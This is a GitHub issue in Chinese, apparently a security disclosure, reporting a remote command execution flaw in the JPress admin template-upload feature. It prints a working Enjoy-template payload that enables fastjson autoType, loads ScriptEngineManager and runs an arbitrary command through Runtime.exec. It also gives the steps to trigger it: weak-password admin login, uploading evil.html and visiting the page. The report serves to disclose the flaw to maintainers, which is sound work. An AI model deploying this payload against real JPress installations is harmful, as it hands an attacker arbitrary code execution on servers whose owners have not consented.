Skip to content

jpress后台存在命令执行漏洞-模板上传 #169

Closed
@testtttter

Description

@testtttter

审计过程

jpress后台存在模板上传功能,不过存在些许过滤,我们使用fastjson来辅助获取ScriptEngineManager,然后执行任意js代码,就可以实现rce,payload如下

#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) 
#(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) 
#set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}'))
#set(e=x.getEngineByName("js")) 
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))

效果演示

弱密码进入后台,修改上传evil.html
image-20211221221541437

访问http://localhost/evil,可以看到计算器弹出,漏洞验证成功

image-20211221221558381

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions